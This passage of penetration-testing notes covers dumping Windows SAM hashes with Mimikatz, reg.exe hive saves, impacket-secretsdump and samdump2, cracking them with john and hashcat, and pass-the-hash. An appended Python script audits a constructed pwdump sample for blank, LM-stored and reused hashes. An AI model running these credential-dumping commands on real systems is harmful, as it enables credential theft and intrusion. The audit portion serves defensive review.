If the hash cannot be cracked, consider pass-the-hash instead.
Mimikatz
- To dump the hashes from a running system you need local admin rights; then run mimikatz:
privilege::debug
token::elevate
lsadump::sam
john --wordlist=/usr/share/seclists/rockyou.txt hash.txt --format=NT
Registry (REG SAVE)
- On target, run:
reg.exe save hklm\sam sam.save
reg.exe save hklm\security security.save
reg.exe save hklm\system system.save
- Then run:
impacket-secretsdump -sam sam.save -security security.save -system system.save LOCAL
- If there is no security.save, samdump2 also works (less reliable, avoid if possible):
samdump2 system.save sam.save
- Output is pwdump format (user:RID:LM:NT:::), so the NT hash is the 4th colon-separated field. Can also use John:
john --wordlist=/usr/share/seclists/rockyou.txt hash.txt --format=NT
- Hashcat:
hashcat -m 1000 -a 0 hash.txt /usr/share/seclists/rockyou.txt
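Added example (not from the original notes): a small parser for the pwdump-style lines secretsdump prints, plus the audit checks a defender runs on such a dump before anything else: blank passwords, legacy LM hashes still stored, and the same NT hash reused across accounts. The sample lines and hash values are constructed, not from a real system; the two empty-password constants are the well-known public values.

```python
import re
from collections import defaultdict

# Well-known hashes of an empty password (public constants).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
HEX32 = re.compile(r"^[0-9a-f]{32}$")

# Constructed sample dump; the NT/LM values are made up for the demo.
SAMPLE = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:00112233445566778899aabbccddeeff:0123456789abcdef0123456789abcdef:::
alice:1002:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
"""

def parse_pwdump(text):
    """Parse user:RID:LM:NT::: lines; skip blanks, comments and malformed rows."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        lm, nt = parts[2].lower(), parts[3].lower()
        if not (HEX32.match(lm) and HEX32.match(nt)):
            continue  # not a valid 32-hex-digit hash pair
        records.append({"user": parts[0], "rid": int(parts[1]), "lm": lm, "nt": nt})
    return records

def audit(records):
    """Return (account, finding) pairs a password-hygiene review would report."""
    findings = []
    by_nt = defaultdict(list)
    for r in records:
        if r["nt"] == EMPTY_NT:
            findings.append((r["user"], "empty password (blank NT hash)"))
        if r["lm"] != EMPTY_LM:
            findings.append((r["user"], "LM hash stored (legacy, trivially crackable)"))
        by_nt[r["nt"]].append(r["user"])
    for nt, users in by_nt.items():
        if nt != EMPTY_NT and len(users) > 1:
            findings.append((",".join(sorted(users)), "same password shared across accounts"))
    return findings

if __name__ == "__main__":
    for account, issue in audit(parse_pwdump(SAMPLE)):
        print(f"{account}: {issue}")
```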